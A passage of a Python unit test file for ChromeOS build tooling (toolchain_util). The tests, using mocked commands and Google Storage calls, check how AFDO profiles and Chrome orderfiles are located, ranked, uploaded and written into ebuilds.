self.runCreateAndUploadMergedAFDOProfileOnce(recent_to_merge=1),
self.runCreateAndUploadMergedAFDOProfileOnce(max_age_days=0),
]
for merged_name, mocks in runs:
self.assertIsNone(merged_name)
self.gs_context.Copy.assert_not_called()
mocks.run_command.assert_not_called()
mocks.uncompress_file.assert_not_called()
mocks.compress_file.assert_not_called()
class FindEbuildPathTest(cros_test_lib.MockTempDirTestCase):
"""Test top-level function _FindEbuildPath()."""
def setUp(self):
self.board = 'lulu'
self.chrome_package = 'chromeos-chrome'
self.kernel_package = 'chromeos-kernel-3_14'
self.chrome_ebuild = \
'/mnt/host/source/src/path/to/chromeos-chrome-1.0.ebuild'
mock_result = cros_build_lib.CommandResult(output=self.chrome_ebuild)
self.mock_command = self.PatchObject(
cros_build_lib, 'run', return_value=mock_result)
# pylint: disable=protected-access
def testInvalidPackage(self):
"""Test invalid package name."""
with self.assertRaises(ValueError) as context:
toolchain_util._FindEbuildPath('some-invalid-package')
self.assertIn('Invalid package name', str(context.exception))
self.mock_command.assert_not_called()
def testChromePackagePass(self):
"""Test finding chrome ebuild work."""
ebuild_file = toolchain_util._FindEbuildPath(self.chrome_package)
cmd = ['equery', 'w', self.chrome_package]
self.mock_command.assert_called_with(
cmd, enter_chroot=True, stdout=True, encoding='utf-8')
self.assertEqual(ebuild_file, self.chrome_ebuild)
def testKernelPackagePass(self):
"""Test finding kernel ebuild work."""
ebuild_path = \
'/mnt/host/source/src/path/to/chromeos-kernel-3_14-3.14-r1.ebuild'
mock_result = cros_build_lib.CommandResult(output=ebuild_path)
mock_command = self.PatchObject(
cros_build_lib, 'run', return_value=mock_result)
ebuild_file = toolchain_util._FindEbuildPath(self.kernel_package)
cmd = ['equery', 'w', self.kernel_package]
mock_command.assert_called_with(
cmd, enter_chroot=True, stdout=True, encoding='utf-8')
self.assertEqual(ebuild_file, ebuild_path)
def testPassWithBoardName(self):
"""Test working with a board name."""
ebuild_file = toolchain_util._FindEbuildPath(
self.chrome_package, board='board')
cmd = ['equery-board', 'w', self.chrome_package]
self.mock_command.assert_called_with(
cmd, enter_chroot=True, stdout=True, encoding='utf-8')
self.assertEqual(ebuild_file, self.chrome_ebuild)
def testReturnPathOutsideChroot(self):
"""Test returning correct path outside chroot."""
ebuild_file = toolchain_util._FindEbuildPath(
self.chrome_package, buildroot='/path/to/buildroot')
self.assertEqual(
ebuild_file,
'/path/to/buildroot/src/path/to/chromeos-chrome-1.0.ebuild')
class LatestAFDOArtifactTest(cros_test_lib.RunCommandTempDirTestCase):
"""Test related function to compare freshness of AFDO artifacts."""
# pylint: disable=protected-access
def setUp(self):
self.board = 'board'
self.gs_url = 'gs://path/to/any_gs_url'
self.current_branch = '78'
self.current_arch = 'airmont'
self.MockListResult = collections.namedtuple('MockListResult',
('url', 'creation_time'))
files_in_gs_bucket = [
# Benchmark profiles
('chromeos-chrome-amd64-78.0.3893.0_rc-r1.afdo.bz2', 2.0),
('chromeos-chrome-amd64-78.0.3896.0_rc-r1.afdo.bz2', 1.0), # Latest
('chromeos-chrome-amd64-78.0.3897.0_rc-r1-merged.afdo.bz2', 3.0),
# CWP profiles
('R78-3869.38-1562580965.afdo.xz', 2.1),
('R78-3866.0-1570000000.afdo.xz', 1.1), # Latest
('R77-3811.0-1580000000.afdo.xz', 3.1),
# Kernel profiles
('R76-3869.38-1562580965.gcov.xz', 1.3),
('R76-3866.0-1570000000.gcov.xz', 2.3), # Latest
# Orderfiles
('chromeos-chrome-orderfile-field-78-3877.0-1567418235-'
'benchmark-78.0.3893.0-r1.orderfile.xz', 1.2), # Latest
('chromeos-chrome-orderfile-field-78-3877.0-1567418235-'
'benchmark-78.0.3850.0-r1.orderfile.xz', 2.2),
]
self.gs_list = [
self.MockListResult(url=os.path.join(self.gs_url, x), creation_time=y)
for x, y in files_in_gs_bucket
]
self.PatchObject(gs.GSContext, 'List', return_value=self.gs_list)
self.PatchObject(
toolchain_util,
'_FindCurrentChromeBranch',
return_value=self.current_branch)
def testFindCurrentChromeBranch(self):
"""Test _FindCurrentChromeBranch() works correctly."""
chrome_name = 'chromeos-chrome-78.0.3893.0_rc-r1.ebuild'
self.PatchObject(
toolchain_util,
'_FindEbuildPath',
return_value=os.path.join('/path/to', chrome_name))
ret = toolchain_util._FindCurrentChromeBranch()
self.assertEqual(ret, self.current_branch)
def testFindLatestAFDOArtifactPassWithBenchmarkAFDO(self):
"""Test _FindLatestAFDOArtifact returns latest benchmark AFDO."""
latest_afdo = toolchain_util._FindLatestAFDOArtifact(
self.gs_url, toolchain_util._RankValidBenchmarkProfiles)
self.assertEqual(latest_afdo,
'chromeos-chrome-amd64-78.0.3896.0_rc-r1.afdo.bz2')
def testFindLatestAFDOArtifactPassWithCWPAFDO(self):
"""Test _FindLatestAFDOArtifact return latest cwp AFDO."""
latest_afdo = toolchain_util._FindLatestAFDOArtifact(
self.gs_url, toolchain_util._RankValidCWPProfiles)
self.assertEqual(latest_afdo, 'R78-3866.0-1570000000.afdo.xz')
def testFindLatestAFDOArtifactPassWithKernelAFDO(self):
"""Test _FindLatestAFDOArtifact return latest kernel AFDO."""
self.PatchObject(
toolchain_util, '_FindCurrentChromeBranch', return_value='76')
latest_afdo = toolchain_util._FindLatestAFDOArtifact(
self.gs_url, toolchain_util._RankValidCWPProfiles)
self.assertEqual(latest_afdo, 'R76-3866.0-1570000000.gcov.xz')
def testFindLatestAFDOArtifactPassWithOrderfile(self):
"""Test _FindLatestAFDOArtifact return latest orderfile."""
latest_orderfile = toolchain_util._FindLatestAFDOArtifact(
self.gs_url, toolchain_util._RankValidOrderfiles)
self.assertEqual(
latest_orderfile,
'chromeos-chrome-orderfile-field-78-3877.0-1567418235-'
'benchmark-78.0.3893.0-r1.orderfile.xz')
def testFindLatestAFDOArtifactPassOnLastBranch(self):
"""Test returns latest file on last branch when current has none."""
self.PatchObject(
toolchain_util, '_FindCurrentChromeBranch', return_value='79')
self.testFindLatestAFDOArtifactPassWithBenchmarkAFDO()
def testFindLatestAFDOArtifactFailToFindAnyFiles(self):
"""Test function fails when no files on current branch."""
self.PatchObject(
toolchain_util, '_FindCurrentChromeBranch', return_value='80')
with self.assertRaises(RuntimeError) as context:
self.testFindLatestAFDOArtifactPassWithBenchmarkAFDO()
self.assertEqual('No files found on %s for branch 80' % self.gs_url,
str(context.exception))
def testFindLatestAFDOArtifactsFindMaxFromInvalidFiles(self):
"""Test function fails when searching max from list of invalid files."""
mock_gs_list = [
self.MockListResult(
url=os.path.join(self.gs_url, 'Invalid-name-but-end-in-78.afdo'),
creation_time=1.0)
]
self.PatchObject(gs.GSContext, 'List', return_value=mock_gs_list)
with self.assertRaises(RuntimeError) as context:
toolchain_util._FindLatestAFDOArtifact(
self.gs_url, toolchain_util._RankValidBenchmarkProfiles)
self.assertIn('No valid latest artifact was found', str(context.exception))
class UploadAFDOArtifactToGSBucketTest(gs_unittest.AbstractGSContextTest):
"""Test top-level function _UploadAFDOArtifactToGSBucket."""
# pylint: disable=protected-access
def setUp(self):
self.gs_url = 'gs://some/random/gs/url'
self.local_path = '/path/to/file'
self.rename = 'new_file_name'
self.url_without_renaming = os.path.join(self.gs_url, 'file')
self.url_with_renaming = os.path.join(self.gs_url, 'new_file_name')
self.mock_copy = self.PatchObject(gs.GSContext, 'Copy')
def testFileToUploadNotExistTriggerException(self):
"""Test the file to upload doesn't exist in the local path."""
with self.assertRaises(RuntimeError) as context:
toolchain_util._UploadAFDOArtifactToGSBucket(self.gs_url, self.local_path)
self.assertIn('to upload does not exist', str(context.exception))
def testFileToUploadAlreadyInBucketSkipsException(self):
"""Test uploading a file that already exists in the bucket."""
self.PatchObject(os.path, 'exists', return_value=True)
mock_exist = self.PatchObject(gs.GSContext, 'Exists', return_value=True)
toolchain_util._UploadAFDOArtifactToGSBucket(self.gs_url, self.local_path)
mock_exist.assert_called_once_with(self.url_without_renaming)
self.mock_copy.assert_not_called()
def testFileUploadSuccessWithoutRenaming(self):
"""Test successfully upload a file without renaming."""
self.PatchObject(os.path, 'exists', return_value=True)
self.PatchObject(gs.GSContext, 'Exists', return_value=False)
toolchain_util._UploadAFDOArtifactToGSBucket(self.gs_url, self.local_path)
self.mock_copy.assert_called_once_with(
self.local_path, self.url_without_renaming, acl='public-read')
def testFileUploadSuccessWithRenaming(self):
"""Test successfully upload a file with renaming."""
self.PatchObject(os.path, 'exists', return_value=True)
self.PatchObject(gs.GSContext, 'Exists', return_value=False)
toolchain_util._UploadAFDOArtifactToGSBucket(self.gs_url, self.local_path,
self.rename)
self.mock_copy.assert_called_once_with(
self.local_path, self.url_with_renaming, acl='public-read')
class GenerateChromeOrderfileTest(cros_test_lib.MockTempDirTestCase):
"""Test GenerateChromeOrderfile class."""
# pylint: disable=protected-access
def setUp(self):
self.board = 'board'
self.out_dir = os.path.join(self.tempdir, 'outdir')
osutils.SafeMakedirs(self.out_dir)
self.chroot_dir = os.path.join(self.tempdir, 'chroot')
self.working_dir = os.path.join(self.chroot_dir, 'tmp')
osutils.SafeMakedirs(self.working_dir)
self.working_dir_inchroot = '/tmp'
self.chroot_args = []
self.orderfile_name = 'chromeos-chrome-orderfile-1.0'
self.PatchObject(
toolchain_util, '_GetOrderfileName', return_value=self.orderfile_name)
self.test_obj = toolchain_util.GenerateChromeOrderfile(
self.board, self.out_dir, '/path/to/chrome_root', self.chroot_dir,
self.chroot_args)
def testCheckArgumentsFail(self):
"""Test arguments checking fails without files existing."""
with self.assertRaises(
toolchain_util.GenerateChromeOrderfileError) as context:
self.test_obj._CheckArguments()
self.assertIn('Chrome binary does not exist at', str(context.exception))
def testGenerateChromeNM(self):
"""Test generating chrome NM is handled correctly."""
chrome_binary = self.test_obj.CHROME_BINARY_PATH.replace(
'${BOARD}', self.board)
cmd = ['llvm-nm', '-n', chrome_binary]
output = os.path.join(self.working_dir, self.orderfile_name + '.nm')
self.test_obj.tempdir = self.tempdir
self.PatchObject(cros_build_lib, 'run')
self.test_obj._GenerateChromeNM()
cros_build_lib.run.assert_called_with(
cmd, stdout=output, enter_chroot=True, chroot_args=self.chroot_args)
def testPostProcessOrderfile(self):
"""Test post-processing orderfile is handled correctly."""
chrome_nm = os.path.join(self.working_dir_inchroot,
self.orderfile_name + '.nm')
input_orderfile = self.test_obj.INPUT_ORDERFILE_PATH.replace(
'${BOARD}', self.board)
output = os.path.join(self.working_dir_inchroot,
self.orderfile_name + '.orderfile')
self.PatchObject(cros_build_lib, 'run')
self.test_obj._PostProcessOrderfile(chrome_nm)
cmd = [
self.test_obj.PROCESS_SCRIPT, '--chrome', chrome_nm, '--input',
input_orderfile, '--output', output
]
cros_build_lib.run.assert_called_with(
cmd, enter_chroot=True, chroot_args=self.chroot_args)
def testSuccessRun(self):
"""Test the main function is running successfully."""
    # Patch the two functions that generate artifacts, since their inputs
    # don't exist without actually building Chrome.
chrome_nm = os.path.join(self.working_dir, self.orderfile_name + '.nm')
with open(chrome_nm, 'w') as f:
print('Write something in the nm file', file=f)
self.PatchObject(
toolchain_util.GenerateChromeOrderfile,
'_GenerateChromeNM',
return_value=chrome_nm)
chrome_orderfile = os.path.join(self.working_dir,
self.orderfile_name + '.orderfile')
with open(chrome_orderfile, 'w') as f:
print('Write something in the orderfile', file=f)
self.PatchObject(
toolchain_util.GenerateChromeOrderfile,
'_PostProcessOrderfile',
return_value=chrome_orderfile)
self.PatchObject(toolchain_util.GenerateChromeOrderfile, '_CheckArguments')
mock_upload = self.PatchObject(toolchain_util,
'_UploadAFDOArtifactToGSBucket')
self.test_obj.Perform()
# Make sure the tarballs are inside the output directory
output_files = os.listdir(self.out_dir)
self.assertIn(
self.orderfile_name + '.nm' + toolchain_util.XZ_COMPRESSION_SUFFIX,
output_files)
self.assertIn(
self.orderfile_name + '.orderfile' +
toolchain_util.XZ_COMPRESSION_SUFFIX, output_files)
self.assertEqual(mock_upload.call_count, 2)
class UpdateEbuildWithAFDOArtifactsTest(cros_test_lib.MockTempDirTestCase):
"""Test UpdateEbuildWithAFDOArtifacts class."""
# pylint: disable=protected-access
def setUp(self):
self.board = 'board'
self.package = 'valid-package'
self.PatchObject(cros_build_lib, 'IsInsideChroot', return_value=True)
self.variable_name = 'VARIABLE_NAME'
self.variable_value = 'new-afdo-artifact-1.1'
self.test_obj = toolchain_util.UpdateEbuildWithAFDOArtifacts(
self.board, self.package, {self.variable_name: self.variable_value})
def testPatchEbuildFailWithoutMarkers(self):
"""Test _PatchEbuild() fail if the ebuild has no valid markers."""
ebuild_file = os.path.join(self.tempdir, self.package + '.ebuild')
osutils.Touch(ebuild_file)
with self.assertRaises(
toolchain_util.UpdateEbuildWithAFDOArtifactsError) as context:
self.test_obj._PatchEbuild(ebuild_file)
self.assertEqual(
'Ebuild file does not have appropriate marker for AFDO/orderfile.',
str(context.exception))
def testPatchEbuildWithOneRule(self):
"""Test _PatchEbuild() works with only one rule to replace."""
ebuild_file = os.path.join(self.tempdir, self.package + '.ebuild')
ebuild_file_content = '\n'.join([
'Some message before',
'%s="old-afdo-artifact-1.0"' % self.variable_name, 'Some message after'
])
osutils.WriteFile(ebuild_file, ebuild_file_content)
self.test_obj._PatchEbuild(ebuild_file)
# Make sure temporary file is removed
self.assertNotIn(self.package + '.ebuild.new', os.listdir(self.tempdir))
# Make sure the artifact is updated
pattern = re.compile(toolchain_util.AFDO_ARTIFACT_EBUILD_REGEX %
self.variable_name)
found = False
with open(ebuild_file) as f:
for line in f:
matched = pattern.match(line)
if matched:
found = True
self.assertEqual(matched.group('name')[1:-1], self.variable_value)
self.assertTrue(found)
def testPatchEbuildWithMultipleRulesPass(self):
"""Test _PatchEbuild() works with multiple rules to replace."""
ebuild_file = os.path.join(self.tempdir, self.package + '.ebuild')
another_variable_name = 'VARIABLE_NAME2'
another_variable_value = 'another-new-afdo-artifact-2.0'
ebuild_file_content = '\n'.join([
'Some message before',
'%s="old-afdo-artifact-1.0"' % self.variable_name,
'%s="another-old-afdo-artifact-1.0"' % another_variable_name,
'Some message after'
])
osutils.WriteFile(ebuild_file, ebuild_file_content)
test_obj = toolchain_util.UpdateEbuildWithAFDOArtifacts(
self.board, self.package, {
self.variable_name: self.variable_value,
another_variable_name: another_variable_value
})
test_obj._PatchEbuild(ebuild_file)
# Make sure all patterns are updated.
patterns = [
re.compile(toolchain_util.AFDO_ARTIFACT_EBUILD_REGEX %
self.variable_name),
re.compile(toolchain_util.AFDO_ARTIFACT_EBUILD_REGEX %
another_variable_name)
]
values = [self.variable_value, another_variable_value]
found = 0
with open(ebuild_file) as f:
for line in f:
for p in patterns:
matched = p.match(line)
if matched:
found += 1
self.assertEqual(
matched.group('name')[1:-1], values[patterns.index(p)])
break
self.assertEqual(found, len(patterns))
def testPatchEbuildWithMultipleRulesFail(self):
"""Test _PatchEbuild() fails when one marker not found in rules."""
ebuild_file = os.path.join(self.tempdir, self.package + '.ebuild')
ebuild_file_content = '\n'.join([
'Some message before',
'%s="old-afdo-artifact-1.0"' % self.variable_name, 'Some message after'
])
osutils.WriteFile(ebuild_file, ebuild_file_content)
test_obj = toolchain_util.UpdateEbuildWithAFDOArtifacts(
self.board, self.package, {
self.variable_name: self.variable_value,
'another_variable_name': 'another_variable_value'
})
with self.assertRaises(
toolchain_util.UpdateEbuildWithAFDOArtifactsError) as context:
test_obj._PatchEbuild(ebuild_file)
self.assertEqual(
'Ebuild file does not have appropriate marker for AFDO/orderfile.',
str(context.exception))
def testUpdateManifest(self):
"""Test _UpdateManifest() works properly."""
ebuild_file = os.path.join(self.tempdir, self.package + '.ebuild')
cmd = ['ebuild-%s' % self.board, ebuild_file, 'manifest', '--force']
self.PatchObject(cros_build_lib, 'run')
self.test_obj._UpdateManifest(ebuild_file)
cros_build_lib.run.assert_called_with(cmd, enter_chroot=True)
class CheckAFDOArtifactExistsTest(cros_test_lib.RunCommandTempDirTestCase):
"""Test CheckAFDOArtifactExists command."""
def setUp(self):
self.orderfile_name = 'any_orderfile_name'
self.afdo_name = 'any_name.afdo'
self.PatchObject(
toolchain_util, '_FindCurrentChromeBranch', return_value='78')
def _CheckExistCall(self, target, url_to_check, board='board'):
"""Helper function to check the Exists() call on a url."""
for exists in [False, True]:
mock_exist = self.PatchObject(gs.GSContext, 'Exists', return_value=exists)
ret = toolchain_util.CheckAFDOArtifactExists(
buildroot='buildroot',
chrome_root='chrome_root',
target=target,
board=board)
self.assertEqual(exists, ret)
mock_exist.assert_called_once_with(url_to_check)
def testOrderfileGenerateAsTarget(self):
"""Test check orderfile for generation work properly."""
self.PatchObject(
toolchain_util, '_GetOrderfileName', return_value=self.orderfile_name)
self._CheckExistCall(
'orderfile_generate',
os.path.join(
toolchain_util.ORDERFILE_GS_URL_UNVETTED, self.orderfile_name +
'.orderfile' + toolchain_util.XZ_COMPRESSION_SUFFIX))
def testOrderfileVerifyAsTarget(self):
"""Test check orderfile for verification work properly."""
self.PatchObject(
toolchain_util,
'_FindLatestAFDOArtifact',
return_value=self.orderfile_name)
self._CheckExistCall(
'orderfile_verify',
os.path.join(toolchain_util.ORDERFILE_GS_URL_VETTED,
self.orderfile_name))
def testBenchmarkAFDOAsTarget(self):
"""Test check benchmark AFDO generation work properly."""
self.PatchObject(
toolchain_util, '_GetBenchmarkAFDOName', return_value=self.afdo_name)
self._CheckExistCall(
'benchmark_afdo',
os.path.join(toolchain_util.BENCHMARK_AFDO_GS_URL,
self.afdo_name + toolchain_util.BZ2_COMPRESSION_SUFFIX))
def testKernelAFDOAsTarget(self):
"""Test check kernel AFDO verification work properly."""
self.PatchObject(
toolchain_util, '_FindLatestAFDOArtifact', return_value=self.afdo_name)
self._CheckExistCall(
'kernel_afdo',
os.path.join(toolchain_util.KERNEL_AFDO_GS_URL_VETTED, '3.14',
self.afdo_name), 'lulu')
class AFDOUpdateEbuildTests(cros_test_lib.RunCommandTempDirTestCase):
"""Test wrapper functions to update ebuilds for different types."""
mock_benchmark_afdo = 'chromeos-chrome-amd64-78.0.3877.0.afdo.bz2'
mock_cwp_afdo = {
'silvermont': 'R78-3877.0-1566814872.afdo.xz',
'airmont': 'R78-3877.0-1566812873.afdo.xz',
'broadwell': 'R78-3865.35-1566812043.afdo.xz'
}
@staticmethod
def mockFindChromeAFDO(url, _pattern):
"""Mock toolchain_util._FindLatestAFDOArtifact for Chrome AFDO."""
if 'llvm' in url:
return AFDOUpdateEbuildTests.mock_benchmark_afdo
for arch in AFDOUpdateEbuildTests.mock_cwp_afdo:
if arch in url:
return AFDOUpdateEbuildTests.mock_cwp_afdo[arch]
# pylint: disable=protected-access
def setUp(self):
self.board = 'eve'
self.arch = 'broadwell'
self.kver = '4_4'
self.orderfile = 'chrome.orderfile.xz'
self.orderfile_stripped = 'chrome.orderfile'
self.kernel = 'R78-12345.0-1564997810.gcov.xz'
self.kernel_stripped = 'R78-12345.0-1564997810'
self.mock_obj = self.PatchObject(
toolchain_util, 'UpdateEbuildWithAFDOArtifacts', autospec=True)
self.chrome_branch = '78'
self.mock_branch = self.PatchObject(
toolchain_util,
'_FindCurrentChromeBranch',
return_value=self.chrome_branch)
self.mock_warn = self.PatchObject(
toolchain_util, '_WarnSheriffAboutKernelProfileExpiration')
self.PatchObject(
toolchain_util, '_FindCurrentChromeBranch', return_value='78')
self.PatchObject(osutils.TempDir, '__enter__', return_value=self.tempdir)
def testOrderfileUpdateChromePass(self):
"""Test OrderfileUpdateChromeEbuild() calls other functions correctly."""
mock_find = self.PatchObject(
toolchain_util, '_FindLatestAFDOArtifact', return_value=self.orderfile)
toolchain_util.OrderfileUpdateChromeEbuild(self.board)
mock_find.assert_called_once_with(toolchain_util.ORDERFILE_GS_URL_UNVETTED,
toolchain_util._RankValidOrderfiles)
self.mock_obj.assert_called_with(
board=self.board,
package='chromeos-chrome',
update_rules={'UNVETTED_ORDERFILE': self.orderfile_stripped})
# pylint: disable=protected-access
def testAFDOUpdateChromeEbuildPass(self):
"""Test AFDOUpdateChromeEbuild() calls other functions correctly."""
mock_find = self.PatchObject(
toolchain_util,
'_FindLatestAFDOArtifact',
side_effect=self.mockFindChromeAFDO)
afdo_name = 'any_name_for_merged.afdo'
mock_create = self.PatchObject(
toolchain_util, '_CreateReleaseChromeAFDO', return_value=afdo_name)
self.PatchObject(os, 'rename')
ret = toolchain_util.AFDOUpdateChromeEbuild(self.board)
self.assertTrue(ret)
calls = [
mock.call(toolchain_util.BENCHMARK_AFDO_GS_URL,
toolchain_util._RankValidBenchmarkProfiles),
mock.call(
os.path.join(toolchain_util.CWP_AFDO_GS_URL, self.arch),
toolchain_util._RankValidCWPProfiles),
]
mock_find.assert_has_calls(calls)
mock_create.assert_called_with(
os.path.splitext(self.mock_cwp_afdo[self.arch])[0], self.arch,
os.path.splitext(self.mock_benchmark_afdo)[0], self.tempdir)
self.mock_obj.assert_called_with(
board=self.board,
package='chromeos-chrome',
update_rules={'UNVETTED_AFDO_FILE': os.path.join('/tmp', afdo_name)})
# pylint: disable=protected-access
def testAFDOUpdateKernelEbuildPass(self):
"""Test AFDOUpdateKernelEbuild() calls other functions correctly."""
mock_age = self.PatchObject(
toolchain_util, '_GetProfileAge', return_value=0)
mock_find = self.PatchObject(
toolchain_util, '_FindLatestAFDOArtifact', return_value=self.kernel)
ret = toolchain_util.AFDOUpdateKernelEbuild(self.board)
self.assertTrue(ret)
url = os.path.join(toolchain_util.KERNEL_PROFILE_URL,
self.kver.replace('_', '.'))
mock_find.assert_called_once_with(url, toolchain_util._RankValidCWPProfiles)
mock_age.assert_called_once_with(self.kernel_stripped, 'kernel_afdo')
self.mock_warn.assert_not_called()
self.mock_obj.assert_called_with(
board=self.board,
package='chromeos-kernel-' + self.kver,
update_rules={'AFDO_PROFILE_VERSION': self.kernel_stripped})
def testAFDOUpdateKernelEbuildFailDueToExpire(self):
"""Test AFDOUpdateKernelEbuild() fails when the profile expires."""
self.PatchObject(
toolchain_util,
'_GetProfileAge',
return_value=toolchain_util.KERNEL_ALLOWED_STALE_DAYS + 1)
self.PatchObject(
toolchain_util, '_FindLatestAFDOArtifact', return_value=self.kernel)
ret = toolchain_util.AFDOUpdateKernelEbuild(self.board)
self.assertFalse(ret)
def testAFDOUpdateKernelEbuildWarnSheriff(self):
"""Test AFDOUpdateKernelEbuild() warns sheriff when profile near expire."""
self.PatchObject(
toolchain_util,
'_GetProfileAge',
return_value=toolchain_util.KERNEL_ALLOWED_STALE_DAYS - 1)
self.PatchObject(
toolchain_util, '_FindLatestAFDOArtifact', return_value=self.kernel)
ret = toolchain_util.AFDOUpdateKernelEbuild(self.board)
self.assertTrue(ret)
self.mock_warn.assert_called_once_with(self.kver, self.kernel_stripped)
class GenerateBenchmarkAFDOProfile(cros_test_lib.MockTempDirTestCase):
"""Test GenerateBenchmarkAFDOProfile class."""
# pylint: disable=protected-access
def setUp(self):
self.buildroot = self.tempdir
self.chroot_dir = os.path.join(self.tempdir, 'chroot')
osutils.SafeMakedirs(self.chroot_dir)
self.chroot_args = []
self.working_dir = os.path.join(self.chroot_dir, 'tmp')
osutils.SafeMakedirs(self.working_dir)
self.output_dir = os.path.join(self.tempdir, 'outdir')
unused = {
'pv': None,
'rev': None,
'category': None,
'cpv': None,
'cp': None,
'cpf': None
}
self.package = 'chromeos-chrome'
self.version = '77.0.3863.0_rc-r1'
self.chrome_cpv = portage_util.CPV(
version_no_rev=self.version.split('_')[0],
package=self.package,
version=self.version,
**unused)
self.board = 'board'
self.arch = 'amd64'
self.PatchObject(
portage_util, 'PortageqBestVisible', return_value=self.chrome_cpv)
self.PatchObject(portage_util, 'PortageqEnvvar')
self.test_obj = toolchain_util.GenerateBenchmarkAFDOProfile(
board=self.board,
output_dir=self.output_dir,
chroot_path=self.chroot_dir,
chroot_args=self.chroot_args)
self.test_obj.arch = self.arch
def testDecompressAFDOFile(self):
"""Test _DecompressAFDOFile method."""
perf_data = 'perf.data.bz2'
to_decompress = os.path.join(self.working_dir, perf_data)
mock_uncompress = self.PatchObject(cros_build_lib, 'UncompressFile')
ret = self.test_obj._DecompressAFDOFile(to_decompress)
dest = os.path.join(self.working_dir, 'perf.data')
mock_uncompress.assert_called_once_with(to_decompress, dest)
self.assertEqual(ret, dest)
def testGetPerfAFDOName(self):
"""Test _GetPerfAFDOName method."""
ret = self.test_obj._GetPerfAFDOName()
perf_data_name = toolchain_util.CHROME_PERF_AFDO_FILE % {
'package': self.package,
'arch': self.arch,
'versionnorev': self.version.split('_')[0]
}
self.assertEqual(ret, perf_data_name)
def testCheckAFDOPerfDataStatus(self):
"""Test _CheckAFDOPerfDataStatus method."""
afdo_name = 'chromeos.afdo'
url = os.path.join(toolchain_util.BENCHMARK_AFDO_GS_URL,
afdo_name + toolchain_util.BZ2_COMPRESSION_SUFFIX)
for exist in [True, False]:
mock_exist = self.PatchObject(gs.GSContext, 'Exists', return_value=exist)
self.PatchObject(
toolchain_util.GenerateBenchmarkAFDOProfile,
'_GetPerfAFDOName',
return_value=afdo_name)
ret_value = self.test_obj._CheckAFDOPerfDataStatus()
self.assertEqual(exist, ret_value)
mock_exist.assert_called_once_with(url)
def testWaitForAFDOPerfDataTimeOut(self):
"""Test _WaitForAFDOPerfData method with timeout."""
def mock_timeout(*_args, **_kwargs):
raise timeout_util.TimeoutError
self.PatchObject(timeout_util, 'WaitForReturnTrue', new=mock_timeout)
ret = self.test_obj._WaitForAFDOPerfData()
self.assertFalse(ret)
def testWaitForAFDOPerfDataSuccess(self):
"""Test method _WaitForAFDOPerfData() passes."""
mock_wait = self.PatchObject(timeout_util, 'WaitForReturnTrue')
afdo_name = 'perf.data'
mock_get = self.PatchObject(
toolchain_util.GenerateBenchmarkAFDOProfile,
'_GetPerfAFDOName',
return_value=afdo_name)
# TODO(crbug/1065172): Invalid assertion that had previously been mocked.
# mock_check =
self.PatchObject(toolchain_util.GenerateBenchmarkAFDOProfile,
'_CheckAFDOPerfDataStatus')
mock_decompress = self.PatchObject(
toolchain_util.GenerateBenchmarkAFDOProfile, '_DecompressAFDOFile')
mock_copy = self.PatchObject(gs.GSContext, 'Copy')
self.test_obj._WaitForAFDOPerfData()
mock_wait.assert_called_once_with(
self.test_obj._CheckAFDOPerfDataStatus,
timeout=constants.AFDO_GENERATE_TIMEOUT,
period=constants.SLEEP_TIMEOUT)
# TODO(crbug/1065172): Invalid assertion that had previously been mocked.
# mock_check.assert_called_once()
    # In the actual program, this function would be called twice. But since
    # the _CheckAFDOPerfDataStatus() it calls is mocked, it's only called
    # once in this test.
mock_get.assert_called_once()
dest = os.path.join(self.working_dir, 'perf.data.bz2')
mock_decompress.assert_called_once_with(dest)
mock_copy.assert_called_once()
def testCreateAFDOFromPerfData(self):
"""Test method _CreateAFDOFromPerfData()."""
# Intercept the real path to chrome binary
mock_chrome_debug = os.path.join(self.working_dir, 'chrome.debug')
toolchain_util._CHROME_DEBUG_BIN = mock_chrome_debug
osutils.Touch(mock_chrome_debug)
perf_name = 'chromeos-chrome-amd64-77.0.3849.0.perf.data'
self.PatchObject(
toolchain_util.GenerateBenchmarkAFDOProfile,
'_GetPerfAFDOName',
return_value=perf_name)
afdo_name = 'chromeos-chrome-amd64-77.0.3849.0_rc-r1.afdo'
self.PatchObject(
toolchain_util, '_GetBenchmarkAFDOName', return_value=afdo_name)
mock_command = self.PatchObject(cros_build_lib, 'run')
self.test_obj._CreateAFDOFromPerfData()
afdo_cmd = [
toolchain_util._AFDO_GENERATE_LLVM_PROF,
'--binary=/tmp/chrome.unstripped', '--profile=/tmp/' + perf_name,
'--out=/tmp/' + afdo_name
]
mock_command.assert_called_once_with(
afdo_cmd,
enter_chroot=True,
capture_output=True,
print_cmd=True,
chroot_args=self.chroot_args)
def testUploadArtifacts(self):
"""Test member _UploadArtifacts()."""
chrome_binary = 'chrome.unstripped'
afdo_name = 'chrome-1.0.afdo'
mock_upload = self.PatchObject(toolchain_util,
'_UploadAFDOArtifactToGSBucket')
self.test_obj._UploadArtifacts(chrome_binary, afdo_name)
chrome_version = toolchain_util.CHROME_ARCH_VERSION % {
'package': self.package,
'arch': self.arch,
'version': self.version
}
upload_name = chrome_version + '.debug' + \
toolchain_util.BZ2_COMPRESSION_SUFFIX
calls = [
mock.call(
toolchain_util.BENCHMARK_AFDO_GS_URL,
os.path.join(self.output_dir,
chrome_binary + toolchain_util.BZ2_COMPRESSION_SUFFIX),
rename=upload_name),
mock.call(
toolchain_util.BENCHMARK_AFDO_GS_URL,
os.path.join(self.output_dir,
afdo_name + toolchain_util.BZ2_COMPRESSION_SUFFIX))
]
mock_upload.assert_has_calls(calls)
def testGenerateAFDOData(self):
"""Test main function of _GenerateAFDOData()."""
chrome_binary = toolchain_util._CHROME_DEBUG_BIN % {
'root': self.chroot_dir,
'sysroot': os.path.join('build', self.board)
}
afdo_name = 'chrome.afdo'
mock_create = self.PatchObject(
self.test_obj, '_CreateAFDOFromPerfData', return_value=afdo_name)
mock_compress = self.PatchObject(toolchain_util, '_CompressAFDOFiles')
mock_upload = self.PatchObject(self.test_obj, '_UploadArtifacts')
ret = self.test_obj._GenerateAFDOData()
self.assertEqual(ret, afdo_name)
mock_create.assert_called_once_with()
calls = [
mock.call(
targets=[chrome_binary],
input_dir=None,
output_dir=self.output_dir,
suffix=toolchain_util.BZ2_COMPRESSION_SUFFIX),
mock.call(
targets=[afdo_name],
input_dir=self.working_dir,
output_dir=self.output_dir,
suffix=toolchain_util.BZ2_COMPRESSION_SUFFIX)
]
mock_compress.assert_has_calls(calls)
mock_upload.assert_called_once_with(chrome_binary, afdo_name)
class UploadVettedAFDOArtifactTest(cros_test_lib.MockTempDirTestCase):
"""Test _UploadVettedAFDOArtifacts()."""
# pylint: disable=protected-access
def setUp(self):
self.artifact = 'some-artifact-1.0'
self.kver = '3.18'
self.cwp_arch = 'broadwell'
